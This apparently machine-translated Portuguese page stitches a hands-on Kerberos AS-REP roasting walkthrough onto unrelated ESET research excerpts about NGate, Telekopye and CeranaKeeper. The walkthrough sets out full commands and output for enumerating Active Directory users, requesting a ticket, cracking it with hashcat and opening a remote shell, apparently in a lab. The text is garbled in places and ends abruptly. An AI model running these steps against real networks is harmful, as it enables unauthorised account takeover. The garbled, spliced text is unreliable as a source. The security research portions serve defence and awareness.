O que é Kerberos?

Kerberos é um protocolo de autenticação usado (normalmente) dentro de um ambiente de diretório ativo para provar a identidade de um dispositivo ao acessar recursos baseados em rede, como SMB, LDAP ou outros protocolos de rede. Legal, então thatilits como Kerberos funciona, agora como podemos quebrá-lo? Boa pergunta, caro leitor! Kerberos é um protocolo super abusável. O iHotell estará mostrando a você um vetor de ataque hoje que lhe dará acesso a uma conta de usuário, e tudo o que você precisa fazer é saber o nome de usuário (e a conta de usuário deve ter a Pré-Autenticação ativada… Mas isso está fora de nosso controle)!

Ferramentas

Primeiro, você precisará Empacotamento baixado em seu sistema.

┌─[root@Sp00kyS3c]─[~]
└──╼ #git clone https://github.com/SecureAuthCorp/impacket.git
Cloning into 'impacket'...
remote: Enumerating objects: 16, done.
remote: Counting objects: 100% (16/16), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 16908 (delta 2), reused 6 (delta 2), pack-reused 16892
Receiving objects: 100% (16908/16908), 5.57 MiB | 8.81 MiB/s, done.
Resolving deltas: 100% (12911/12911), done.
┌─[root@MrS1n1st3r]─[~]
└──╼ #cd impacket/examples/
┌─[root@Sp00kyS3c]─[~/impacket/examples]
└──╼ #ls 
atexec.py    esentutl.py    GetNPUsers.py  getTGT.py       ifmap.py       lookupsid.py   mssqlclient.py    nmapAnswerMachine.py  opdump.py  psexec.py      registry-read.py  sambaPipe.py    services.py   smbrelayx.py  sniff.py     wmiexec.py
dcomexec.py  GetADUsers.py  getPac.py      GetUserSPNs.py  karmaSMB.py    mimikatz.py    mssqlinstance.py  ntfs-read.py          ping6.py   raiseChild.py  reg.py            samrdump.py     smbclient.py  smbserver.py  split.py     wmipersist.py
dpapi.py     getArch.py     getST.py       goldenPac.py    kintercept.py  mqtt_check.py  netview.py        ntlmrelayx.py         ping.py    rdp_check.py   rpcdump.py        secretsdump.py  smbexec.py    sniffer.py    ticketer.py  wmiquery.py
┌─[root@Sp00kyS3c]─[~/impacket/examples]
└──╼ #

Depois que você chegou a clonar o repositório Impacket, você está praticamente pronto para ir. O impacket/examples pasta é onde você estará trabalhando principalmente. Nesta pasta, ele contém todas as principais ferramentas que você precisará usar para abuso de protocolo de rede. Dentro das outras pastas no impacket diretório, existem outras ferramentas que são necessárias para fazê-lo funcionar. Então, não se preocupe muito com as outras pastas, como você estará trabalhando dentro da pasta de exemplos para a maior parte!

Em seguida, weilitll usar uma ferramenta chamada Kerbrute para forçar brutalmente os usuários na caixa

┌─[root@Sp00kyS3c]─[~/impacket/examples]
└──╼ #wget https://github.com/ropnop/kerbrute/releases/download/v1.0.2/kerbrute_linux_amd64 -O kerbrute
<Snip>
2019-11-17 16:17:05 (7.95 MB/s) - ‘kerbrute’ saved [7831686/7831686]

┌─[root@Sp00kyS3c]─[~/impacket/examples]
└──╼ #chmod +x kerbrute 
┌─[root@Sp00kyS3c]─[~/impacket/examples]
└──╼ #./kerbrute 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.2 (fd5f345) - 11/17/19 - Ronnie Flathers @ropnop

This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication.
It is designed to be used on an internal Windows domain with access to one of the Domain Controllers.
Warning: failed Kerberos Pre-Auth counts as a failed login and WILL lock out accounts

Usage:
  kerbrute [command]

Available Commands:
  bruteforce    Bruteforce username:password combos, from a file or stdin
  bruteuser     Bruteforce a single user's password from a wordlist (use - for stdin)
  help          Help about any command
  passwordspray Test a single password against a list of users (use - for stdin)
  userenum      Enumerate valid domain usernames via Kerberos from a list (use - for stdin)
  version       Display version info and quit

Flags:
      --dc string       The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
  -d, --domain string   The full domain to use (e.g. contoso.com)
  -h, --help            help for kerbrute
  -o, --output string   File to write logs to. Optional.
      --safe            Safe mode. Will abort if any user comes back as locked out. Default: FALSE
  -t, --threads int     Threads to use (default 10)
  -v, --verbose         Log failures and errors

Use "kerbrute [command] --help" for more information about a command.

Tudo bem, então vamos usar as duas ferramentas que baixamos, Kerbrute e GetNPUsers.py dentro do impacket para puxar uma conta de usuário, solicitar um ticket Kerberos e quebrar o hash para finalmente revelar a senha da conta de usuário e ganhar uma posição dentro da rede do Active Directory!

Bruto Forçando Usuários

┌─[root@Sp00kyS3c]─[~/impacket/examples]
└──╼ #./kerbrute userenum /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -d spookysec.local --dc 10.10.13.37

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.2 (fd5f345) - 11/17/19 - Ronnie Flathers @ropnop

2019/11/17 16:20:11 >  Using KDC(s):
2019/11/17 16:20:11 >   10.10.13.37:88

2019/11/17 16:20:11 >  [+] VALID USERNAME:       mark@spookysec.local
2019/11/17 16:20:11 >  [+] VALID USERNAME:       molly@spookysec.local
2019/11/17 16:20:12 >  [+] VALID USERNAME:       ashu@spookysec.local
2019/11/17 16:20:13 >  [+] VALID USERNAME:       dark@spookysec.local
2019/11/17 16:20:16 >  [+] VALID USERNAME:       dan@spookysec.local
2019/11/17 16:20:23 >  [+] VALID USERNAME:       administrator@spookysec.local
2019/11/17 16:20:27 >  [+] VALID USERNAME:       svc-demo@spookysec.local
2019/11/17 16:20:55 >  [+] VALID USERNAME:       sebastian@spookysec.local
2019/11/17 16:22:23 >  [+] VALID USERNAME:       santiago@spookysec.local
2019/11/17 16:22:35 >  [+] VALID USERNAME:       lucy@spookysec.local
2019/11/17 16:23:00 >  [+] VALID USERNAME:       lily@spookysec.local
2019/11/17 16:24:55 >  Done! Tested 8295455 usernames (11 valid) in 4 minutes

Revisando a saída, podemos ver que temos um punhado de usuários que podemos fazer o checkout. Existem vários usuários que devemos verificar imediatamente, Administrador e svc-demo. Isso provavelmente será uma conta de serviço não mantida com altos privilégios que poderíamos usar para ganhar uma posição na rede.

Agora podemos mudar para o impacket e dar uma olhada no GetNPUsers.py, aqui poderemos solicitar um Ticket para a conta de demonstração de svc e esperamos poder quebrar a senha do ticket!

Consultando um bilhete Kerberos

┌─[root@Sp00kyS3c]─[~/impacket/examples]
└──╼ #./GetNPUsers.py spookysec.local/svc-demo -request -no-pass -dc-ip 10.10.13.37
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for svc-demo
$krb5asrep$23$svc-demo@SPOOKYSEC.LOCAL:f1806292678070 <Snip!> 111f279122d10104b0cfe92c45dcca7eddf45d72eed33437a878b2e68cd844e5c5fd59fb2c72701db5a73ad18bf

Cracking Hashes

Lindo! Agora podemos enviá-lo para um arquivo e jogá-lo no Hashcat, usaremos o modo 18200 (para este ticket Kerberos específico)

Dependendo da versão do SO, da configuração do Active Directory, seu ticket Kerberos pode ser diferente. Você pode precisar de um modo diferente. Você pode ver todos eles aqui, sob o Exemplo Hashcat Hashes Página

┌─[✗]─[root@Sp00kyS3c]─[~/hashcat]
└──╼ #hashcat -a 0 -m 18200 ./ticket /usr/share/wordlists/rockyou.txt 
hashcat (v5.1.0) starting...

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 1070, 2029/8116 MB allocatable, 15MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

$krb5asrep$23$svc-demo@SPOOKYSEC.LOCAL:f1806292678070 <Snip!> 111f279122d10104b0cfe92c45dcca7eddf45d72eed33437a878b2e68cd844e5c5fd59fb2c72701db5a73ad18bf:Sup3rS3cr3tP4ssw0rd!
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$svc-demo@SPOOKYSEC.LOCAL:f1806292678070...bffc41
Time.Started.....: Sun Nov 17 16:38:47 2019 (1 sec)
Time.Estimated...: Sun Nov 17 16:38:48 2019 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  9757.1 kH/s (6.50ms) @ Accel:512 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4423680/14344385 (30.84%)
Rejected.........: 0/4423680 (0.00%)
Restore.Point....: 3932160/14344385 (27.41%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: seaford123 -> raain
Hardware.Mon.#1..: Temp: 41c Fan:  0% Util: 10% Core:1949MHz Mem:3802MHz Bus:16

Started: Sun Nov 17 16:38:45 2019
Stopped: Sun Nov 17 16:38:48 2019

Muito rapidamente nós quebramos a senha das contas de usuário. Se o RDP, WinRM ou SMB estiver aberto, agora podemos autenticar cada serviço com a senha da conta de usuário quebrada!

Ganhando Acesso com o Evil-WinRM

Evil-WinRM é um utilitário de acesso remoto que tira proveito da ferramenta de Gerenciamento Remoto do Windows, é super legal e super útil, pois lhe dará uma sessão powershell diretamente na caixa.

┌─[✗]─[root@Sp00kyS3c]─[~/hashcat]
└──╼ #gem install evil-winrm
Happy hacking! :)
Successfully installed evil-winrm-1.9
Parsing documentation for evil-winrm-1.9
Done installing documentation for evil-winrm after 5 seconds
1 gem installed

┌─[root@Sp00kyS3c]─[~/hashcat]
└──╼ #evil-winrm -i 10.10.13.37 -u svc-demo
Enter Password: Sup3rS3cr3tP4ssw0rd!

Evil-WinRM shell v1.9

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-demo\Documents> whoami
spookysec\svc-demo
*Evil-WinRM* PS C:\Users\svc-demo\Documents> 

E sucesso! Agora temos uma posição no domínio! Há uma tonelada de ataques que podemos fazer a partir daqui, no entanto, há um post diferente para outro dia!

Comentários

Feito com 

A equipe de pesquisa da ESET descobriu uma campanha de crimeware direcionada a clientes de três bancos tchecos. O malware, chamado NGate, se destaca por sua habilidade de transmitir dados de cartões de pagamento das vítimas. Ele faz isso por meio de um aplicativo malicioso instalado nos dispositivos Android das vítimas, enviando as informações capturadas diretamente para o dispositivo Android com root do criminoso.

Pontos principais desta postagem do blog:

• Os atacantes combinaram técnicas maliciosas tradicionais — como engenharia social, phishing e malware para Android — em um ataque inovador. Acredita-se que as mensagens de isca foram enviadas para números de telefone aleatórios, com o objetivo de atingir clientes de três bancos específicos.
• De acordo com o Brand Intelligence Service da ESET, o grupo está ativo na República Tcheca desde novembro de 2023, utilizando Progressive Web Apps (PWAs) e WebAPKs maliciosos. Em março de 2024, o grupo aprimorou suas táticas com a implantação do malware NGate para Android.
• Usando o NGate, os invasores conseguiram clonar os dados NFC dos cartões de pagamento físicos das vítimas e retransmiti-los para um dispositivo sob seu controle. Esse dispositivo invasor emulava o cartão original, permitindo que os criminosos realizassem saques em caixas eletrônicos.
• Esta é a primeira vez que observamos um malware para Android com a capacidade de clonar e emular cartões de pagamento utilizando dados NFC.
• As vítimas não precisaram realizar o root em seus dispositivos para que o ataque fosse bem-sucedido.

O principal objetivo dessa campanha é facilitar a retirada não autorizada de dinheiro das contas bancárias das vítimas. Isso foi conseguido com a transmissão dos dados de comunicação de campo próximo (NFC) dos cartões de pagamento físicos das vítimas, por meio de seus smartphones Android comprometidos usando o malware NGate Android, para o dispositivo do atacante. O invasor então usava esses dados para realizar transações em caixas eletrônicos. Se esse método falhasse, o invasor tinha um plano alternativo para transferir dinheiro das contas das vítimas para outras contas bancárias.

Não vimos essa nova técnica de retransmissão de NFC em nenhum malware para Android descoberto anteriormente. A técnica é baseada em uma ferramenta chamada NFCGate, projetada por estudantes da Universidade Técnica de Darmstadt, na Alemanha, para capturar, analisar ou alterar o tráfego de NFC, razão pela qual batizamos essa nova família de malware de NGate.

Visão geral do malware

As vítimas baixaram e instalaram o malware após serem enganadas, acreditando que estavam se comunicando com seu banco e que seus dispositivos estavam comprometidos. Na verdade, elas haviam comprometido seus próprios dispositivos Android sem perceber, ao baixar e instalar anteriormente um aplicativo através de um link contido em uma mensagem SMS falsa sobre uma suposta restituição de impostos. O vídeo a seguir descreve, em inglês, esse ataque. É importante observar que o NGate nunca esteve disponível na loja oficial do Google Play.

https://www.youtube.com/embed/q69–5rdlmI?si=VjToh9nz2SEUUTWsO malware NGate para Android está relacionado às atividades de phishing de um cibercriminoso que opera na República Tcheca desde novembro de 2023. No entanto, acreditamos que essas atividades foram interrompidas após a prisão de um suspeito em março de 2024.

No final de novembro de 2023, observamos pela primeira vez que o cibercriminoso tinha como alvo os clientes dos principais bancos tchecos. O malware foi distribuído por meio de domínios efêmeros que se disfarçavam de sites bancários legítimos ou aplicativos bancários oficiais disponíveis na Google Play Store, conforme ilustrado na Figura 1. Esses domínios falsos foram identificados no site da Google Play. Esses domínios foram identificados através do Serviço de Inteligência de Marca da ESET, que fornece monitoramento para ameaças que visam a marca de um cliente. Durante o mesmo mês, informamos nossas descobertas aos nossos clientes.

Vitimologia

Durante nossa pesquisa e investigação, identificamos seis aplicativos NGate diferentes que visavam especificamente clientes de três bancos na República Tcheca entre novembro de 2023 e março de 2024.

Em um desenvolvimento substancial, a polícia tcheca prendeu um homem de 22 anos que estava roubando dinheiro de caixas eletrônicos em Praga. No momento da prisão, o suspeito estava em posse de 160 mil coroas tchecas, uma quantia equivalente a mais de 6 mil euros. A nacionalidade da pessoa presa não foi revelada. De acordo com a polícia tcheca, o dinheiro recuperado do suspeito foi roubado apenas das três últimas vítimas, portanto, é provável que o valor total roubado pelo cibercriminoso por trás desse esquema seja consideravelmente maior.

Para saber mais detalhes sobre a pesquisa destacada neste post, confira a publicação (em inglês): NGate Android malware relays NFC traffic to steal cash.

A crescente popularidade dos mercados on-line tem atraído golpistas que se aproveitam de compradores e vendedores desatentos, buscando obter informações de cartões de pagamento em vez de fechar um acordo. A equipe de pesquisa da ESET descobriu que uma dessas redes organizadas de golpistas — que utiliza o Telekopye, um kit de ferramentas identificado pela ESET em 2023 — ampliou suas operações para atingir os usuários de sites de reserva de hospedagem.

No ano passado, publicamos uma série de postagens em nosso blog dividida em duas partes sobre o Telekopye, um kit de ferramentas baseado no Telegram utilizado por cibercriminosos para enganar usuários em mercados on-line. A primeira parte focava nas principais características do Telekopye, enquanto a segunda explorava o funcionamento interno dos grupos de golpistas afiliados. Neste novo post, fazemos um acompanhamento das mudanças nas operações do Telekopye desde nossa última publicação, com base em nosso monitoramento contínuo. Analisamos como esses grupos de golpistas se expandiram para atacar plataformas como Booking.com e Airbnb, além de outros esforços para otimizar suas operações e maximizar os lucros. Além disso, destacamos dicas sobre como se proteger contra essas fraudes.

Pontos-chave deste post:

A equipe de pesquisa da ESET compartilha descobertas atualizadas sobre o Telekopye, um kit de ferramentas de golpe projetado para ajudar cibercriminosos a enganar pessoas em mercados on-line. Enquanto nossa pesquisa anterior explorou os aspectos técnicos e organizacionais das fraudes do Telekopye, nossa investigação mais recente descreve os diversos esforços dos golpistas para maximizar seus lucros financeiros: expandir seu grupo de vítimas, aproveitar oportunidades sazonais e aprimorar suas ferramentas e operações.

Em particular, os grupos associados ao Telekopye ampliaram seus alvos para incluir plataformas populares de reservas de hospedagem, como Booking.com e Airbnb. Esse novo cenário de fraudes traz um elemento inesperado, utilizando contas comprometidas de hotéis legítimos e fornecedores de hospedagem. Essas fraudes foram especialmente frequentes durante a temporada de férias de verão nas regiões-alvo, superando as fraudes tradicionais do Telekopye, conforme indicam os dados da ESET.

Visão Geral do Telekopye

O Telekopye é um kit de ferramentas que funciona como um bot no Telegram, atuando principalmente como um canivete suíço para transformar fraudes em mercados on-line em um negócio ilícito organizado. É utilizado por dezenas de grupos de golpistas, com até milhares de membros, para roubar milhões dos “Mamuts”, como eles chamam os compradores e vendedores-alvo. Os “Neandertais”, como nos referimos aos golpistas, precisam de pouco conhecimento técnico: o Telekopye cuida de tudo em questão de segundos.

Descoberto pela equipe de pesquisa da ESET em 2023, o Telekopye está em uso desde pelo menos 2016, com vítimas em todo o mundo. Múltiplas evidências apontam para a Rússia como o país de origem do autor ou dos autores do bot, assim como dos golpistas que o utilizam. O Telekopye foi projetado para atacar uma ampla variedade de serviços on-line na Europa e na América do Norte, como OLX, Vinted, eBay, Wallapop, entre outros. No momento de produção deste artigo, contabilizamos aproximadamente 90 serviços diferentes que são alvos das fraudes.

Os “Neandertais” — membros de qualquer grupo de Telegram que utilize o Telekopye — têm acesso à interface do usuário do bot, que permite gerar facilmente e-mails de phishing, mensagens SMS, páginas da web e outras funcionalidades.

Os grupos do Telekopye operam de maneira semelhante a uma empresa, com uma hierarquia clara, funções definidas, práticas internas — incluindo processos de admissão e mentoria para novos membros — horários de trabalho fixos e comissões pagas aos administradores do Telekopye. Os participantes responsáveis pelas fraudes devem entregar todas as informações confidenciais que roubam; na verdade, eles não lidam com o roubo de dinheiro, que é gerenciado por outras funções da organização. Cada grupo mantém um chat transparente de todas as transações, acessível a todos os membros.

Os neandertais utilizam dois cenários principais para atacar os mercados on-line: um em que se passam por vendedores e outro, muito mais comum, em que se fazem passar por compradores. Ambos os cenários resultam na vítima — o mamute — inserindo as informações do cartão de pagamento ou as credenciais de home banking em uma página de phishing que se faz passar por um sistema de pagamento.

Recentemente, os grupos do Telekopye expandiram seus alvos, adicionando a possibilidade de enganar usuários de conhecidas plataformas on-line de reservas de hospedagem, assunto que abordaremos na próxima seção.

Expansão para plataformas de reserva de hospedagem

Em 2024, os grupos do Telekopye ampliaram seu repertório de fraudes com planos direcionados a usuários de conhecidas plataformas on-line de reservas de hotéis e apartamentos, como Booking.com e Airbnb. Além disso, eles aumentaram a sofisticação na escolha de suas vítimas.

Um novo recurso na fraude

Neste novo cenário de fraude, os neandertais entram em contato com um usuário-alvo de uma dessas plataformas, alegando que há um problema com o pagamento da reserva do usuário. A mensagem contém um link para uma página da web bem elaborada e com aparência legítima, que se faz passar pela plataforma que foi comprometida.

A página contém informações pré-definidas sobre uma reserva, como as datas de check-in e check-out, o preço e a localização. Isso vem com um elemento preocupante: as informações fornecidas nas páginas falsas coincidem com as reservas reais feitas pelos usuários-alvo.

Os neandertais conseguem isso utilizando contas comprometidas de hotéis e fornecedores de hospedagem legítimos nas plataformas, acesso que provavelmente obtêm por meio de credenciais roubadas adquiridas em fóruns clandestinos. Com esse acesso, os golpistas identificam os usuários que reservaram recentemente uma estadia e ainda não efetuaram o pagamento — ou o fizeram muito recentemente — e entram em contato com eles através do chat da plataforma. Dependendo da plataforma e da configuração da vítima, o usuário recebe um e-mail ou um SMS da plataforma de reservas.

Isso torna a fraude muito mais difícil de detectar, já que as informações fornecidas são pessoalmente relevantes para as vítimas, chegam pelo canal de comunicação esperado e os sites falsos vinculados têm a aparência esperada. A única indicação visível de que algo está errado são os URLs dos sites, que não correspondem aos das páginas legítimas que estão sendo falsificadas. Os neandertais também podem utilizar seus próprios endereços de e-mail para a comunicação inicial (em vez das contas comprometidas), o que tornaria os e-mails mais fáceis de serem identificados como maliciosos.

Uma vez que a vítima preenche o formulário da página de phishing (Figura 1), ela é levada à etapa final da “reserva”: um formulário que solicita os dados do cartão de pagamento (Figura 2). Assim como nas fraudes de mercado, as informações do cartão inseridas no formulário são coletadas pelos neandertais e utilizadas para roubar o dinheiro do cartão da vítima.

Segundo a telemetria da ESET, esse tipo de golpe começou a ganhar destaque em 2024. Como mostra a Figura 3, as fraudes relacionadas a hospedagem registraram um aumento significativo em julho, superando pela primeira vez as fraudes de mercado originais do Telekopye, com mais do que o dobro de detecções naquele mês. Nos meses de agosto e setembro, os níveis de detecção de ambas as categorias se equilibraram.

Como esse aumento coincide com a temporada de férias de verão nas regiões-alvo – o momento ideal para explorar pessoas que estão reservando hospedagens –, ainda não está claro se essa tendência continuará. Analisando os dados globais de 2024, podemos ver que essas fraudes mais recentes acumularam aproximadamente metade das detecções das variantes de mercado. Isso é notável, considerando que essas fraudes mais recentes se concentram apenas em duas plataformas, em comparação com a ampla variedade de mercados on-line que são alvos do Telekopye.

Funcionalidades avançadas do Telekopye

Além de diversificar sua carteira de alvos, os criminosos também aprimoraram suas ferramentas e operações para maximizar seus ganhos financeiros.

Ao longo de nosso monitoramento do Telekopye, observamos que diferentes grupos no Telegram implementam suas próprias funcionalidades avançadas em suas ferramentas, visando acelerar o processo de golpe, melhorar a comunicação com as vítimas, proteger os sites de phishing contra interrupções por parte de concorrentes e atingir outros objetivos.

Geração automática de páginas de phishing

Para acelerar o processo de criação de materiais fraudulentos que imitam compradores em mercados, os criminosos implementaram técnicas de web scraping para plataformas populares. Com essas ferramentas, é suficiente fornecer apenas a URL do produto, eliminando a necessidade de preencher manualmente um formulário sobre o alvo e o produto em questão. O Telekopye analisa a página da web e extrai automaticamente todas as informações necessárias, o que resulta em uma grande aceleração para os golpistas.

Chatbot interativo com tradução em tempo real

Os neanderthals mantêm uma ampla coleção de respostas predefinidas para as perguntas mais frequentes dos alvos. Essas respostas são traduzidas para vários idiomas e armazenadas como parte da documentação interna, com as traduções aperfeiçoadas ao longo dos anos.

Os criminosos costumam utilizar essas frases predefinidas para tentar direcionar a vítima ao site de phishing, que conta com um chatbot no canto inferior direito. Qualquer mensagem que a vítima insira no chat é encaminhada para o chat do Telegram do criminoso, onde é traduzida automaticamente. A tradução automática das mensagens dos criminosos não é suportada – eles traduzem suas mensagens manualmente, geralmente utilizando o DeepL. A Figura 3 ilustra como é uma interação desse tipo do ponto de vista do criminoso e da vítima.

Medidas anti-DDoS

A grande maioria dos sites de phishing utiliza o serviço do Cloudflare, contando com a proteção adicional desse serviço, principalmente contra rastreadores e análises automáticas. Curiosamente, alguns dos sites de phishing do Telekopye também oferecem proteção DDoS integrada. Segundo a base de conhecimentos dos criminosos, à qual conseguimos acessar infiltrando-nos em suas fileiras, essa funcionalidade tem como objetivo se proteger contra ataques de grupos rivais. Esses ataques são ocasionalmente lançados para interromper as operações de um concorrente por um breve período.

Operações policiais

No final de 2023, após a publicação (em duas partes) da ESET sobre o Telekopye, as polícias tcheca e ucraniana detiveram dezenas de cibercriminosos que utilizavam o Telekopye, incluindo os principais envolvidos, em duas operações conjuntas. Ambas as operações tinham como alvo um número indeterminado de grupos do Telekopye, que, segundo estimativas da polícia, haviam acumulado pelo menos 5 milhões de euros (aproximadamente 5,5 milhões de dólares) desde 2021.

Além do evidente sucesso na desarticulação de tais atividades criminosas, as detenções proporcionaram novos insights sobre o funcionamento dos grupos, especialmente sobre as práticas de recrutamento e emprego. Os grupos em questão eram liderados, a partir de locais de trabalho específicos, por homens de meia-idade oriundos da Europa Oriental e da Ásia Ocidental e Central. Eles recrutavam pessoas em situações de vida difíceis, por meio de anúncios em portais de emprego que prometiam “dinheiro fácil”, além de se direcionarem a estudantes estrangeiros tecnicamente qualificados nas universidades.

Alguns criminosos confessaram que também participavam de outro grupo de golpistas, semelhante ao Telekopye, que utilizava centrais de atendimento. A polícia descobriu que os recrutas dessa operação frequentemente tinham seus passaportes e documentos de identidade confiscados, dificultando a possibilidade de renúncia. Além disso, os responsáveis às vezes chegavam a ameaçar os funcionários e seus familiares. Esse fato alarmante coloca essas operações em uma perspectiva completamente diferente.

Recomendações

A melhor forma de se proteger contra as fraudes impulsionadas pelo Telekopye é estar ciente das táticas utilizadas pelos criminosos e agir com cautela nas plataformas afetadas. Além de saber quais sinais de alerta observar, recomendamos fortemente o uso de uma solução de antimalware confiável em seu dispositivo, que possa atuar caso você acabe sendo atraído para um site de phishing.

Fraudes em mercados on-line

• Sempre verifique a pessoa com quem está conversando, prestando atenção ao seu histórico na plataforma, ao tempo de existência da conta, à avaliação e à localização. Uma localização muito distante, uma conta nova sem histórico ou uma avaliação ruim podem ser indicadores de um golpista.
• Com os avanços na tradução automática, é possível que as mensagens de um golpista não apresentem falhas gramaticais. Em vez de se concentrar apenas no idioma, foque na conversa em si: uma comunicação excessivamente ansiosa ou assertiva deve acender um sinal de alerta.
• Mantenha a comunicação na plataforma, mesmo que seu interlocutor sugira o contrário. A falta de disposição dele para permanecer na plataforma deve ser um sinal de alerta importante.
• Se você é comprador, utilize interfaces seguras dentro da plataforma durante todo o processo de compra, sempre que disponíveis. Caso contrário, insista na troca de bens e dinheiro pessoalmente ou organize a escolha de serviços de entrega confiáveis, com a opção de pagamento na entrega.
• Se você é vendedor, utilize interfaces seguras dentro da plataforma durante todo o processo de venda, sempre que disponíveis. Caso contrário, gerencie você mesmo as opções de entrega e não aceite as que o comprador oferecer.
• Se chegar o momento de visitar um link enviado pela pessoa com quem está conversando, certifique-se de verificar cuidadosamente a URL, o conteúdo e as propriedades do certificado do site antes de interagir com ele.

Fraudes na reserva de hospedagem

• Antes de preencher qualquer formulário relacionado à sua reserva, sempre verifique se você não saiu do site ou do aplicativo oficial da plataforma em questão. Ser redirecionado para uma URL externa para prosseguir com sua reserva e pagamento é um indicador de uma possível fraude.
• Dado que essa fraude utiliza contas comprometidas de fornecedores de acomodação, entrar em contato diretamente com os fornecedores não é uma maneira confiável de verificar a legitimidade das solicitações de pagamento. Em caso de dúvida, entre em contato com o serviço de atendimento ao cliente oficial da plataforma (Booking.com, Airbnb) ou reporte um problema de segurança (Booking.com, Airbnb).
• Para proteger sua conta de qualquer risco, tanto se você está reservando uma acomodação quanto se a está alugando, utilize uma senha segura e ative a autenticação em duas etapas sempre que estiver disponível.

Conclusão

Nossa pesquisa sobre as atividades do Telekopye nos proporcionou uma visão única dessas fraudes: conseguimos compreender os meios técnicos que estão por trás da extensão das operações, o aspecto empresarial dos grupos do Telekopye e até mesmo aprender sobre os próprios Neandertais.

Descrevemos os diversos esforços dos grupos para maximizar seus lucros financeiros, incluindo a ampliação de seu grupo de vítimas, a exploração de oportunidades sazonais e a melhoria de suas ferramentas e operações. Em particular, detalhamos a abordagem mais recente dos Neandertais de atacar plataformas de reserva de acomodação, que também envolve alvos mais sofisticados.

Cabe ressaltar que entramos em contato com várias plataformas atacadas pelo Telekopye ao longo de nossa pesquisa; elas estão plenamente cientes dessas fraudes e nos confirmaram que implementaram várias táticas para combatê-las. No entanto, recomenda-se cautela aos usuários devido ao número de fraudes e à sua contínua evolução.

IoCs

Arquivos

Rede

Técnicas ATT&CK do MITRE

Esta tabela foi elaborada utilizando a versão 15 do framework MITRE ATT&CK.

A equipe de pesquisa da ESET observou várias campanhas direcionadas a órgãos governamentais na Tailândia desde 2023. Esses ataques utilizam versões atualizadas de componentes previamente atribuídos ao grupo de ameaças persistentes avançadas (APT) Mustang Panda, alinhado à China, além de um novo conjunto de ferramentas que se aproveitam de serviços como Pastebin, Dropbox, OneDrive e GitHub para executar comandos em máquinas comprometidas e filtrar documentos confidenciais.

Com base em nossas análises, decidimos monitorar esse conjunto de atividades como sendo obra de um grupo de cibercriminosos independente. A recorrência da cadeia “[Bb]ectrl” no código das ferramentas utilizadas pelo grupo nos levou a batizá-lo de “CeranaKeeper”, uma combinação das palavras “beekeeper” (apicultor, em português) e Apis cerana, uma espécie de abelha asiática.

CeranaKeeper abusa de servicios en la nube y de intercambio de archivos populares y legítimos, como Dropbox y OneDrive, para implementar backdoors y herramientas de extracción personalizadas.

Pontos principais deste post:

• A equipe de pesquisa da ESET descobriu um novo grupo de cibercriminosos alinhado à China, o CeranaKeeper, direcionado a órgãos governamentais na Tailândia. Algumas de suas ferramentas foram anteriormente atribuídas por outros pesquisadores ao Mustang Panda.
• O grupo atualiza constantemente seu backdoor para evitar detecção e diversifica seus métodos para facilitar a extração massiva de dados.
• CeranaKeeper se aproveita de serviços de armazenamento em nuvem populares e legítimos, como Dropbox e OneDrive, para implantar backdoors e ferramentas de extração personalizadas.
• O grupo utiliza as funções de solicitação de pull e comentários de problemas no GitHub para criar um shell reverso furtivo, aproveitando o GitHub, uma popular plataforma on-line de compartilhamento e colaboração de código, como servidor de C&C.

CeranaKeeper está ativo pelo menos desde o início de 2022, com foco principal em órgãos governamentais de países asiáticos como Tailândia, Mianmar, Filipinas, Japão e Taiwan; acreditamos que esteja alinhado com os interesses da China. Destaca-se pela incessante busca por dados, na qual seus atacantes utilizam uma ampla gama de ferramentas para extrair o máximo de informações possível das redes comprometidas. Na operação que analisamos, o grupo transformou as máquinas comprometidas em servidores de atualização, desenvolveu uma técnica inovadora usando as funções de solicitação de pull e comentários de problemas do GitHub para criar um shell reverso sigiloso, e implantou componentes de coleta de uso único ao capturar árvores inteiras de arquivos.

Apresentamos brevemente o CeranaKeeper no Relatório de Atividade APT da ESET, que abrangeu o quarto trimestre de 2023 até o primeiro trimestre de 2024 e foi publicado em maio de 2024. Neste post, descrevemos essas ferramentas personalizadas, até então não documentadas, utilizadas pelo CeranaKeeper, e compartilhamos mais descobertas sobre as operações desse grupo cibercriminoso.

Algumas de nossas descobertas sobre o CeranaKeeper e o incidente na Tailândia foram apresentados na conferência Virus Bulletin em 2 de outubro de 2024 e no nosso white paper, que pode ser lido na íntegra aqui. Ainda este mês, o Virus Bulletin também publicará nosso white paper sobre o tema em seu site.

Atribuição

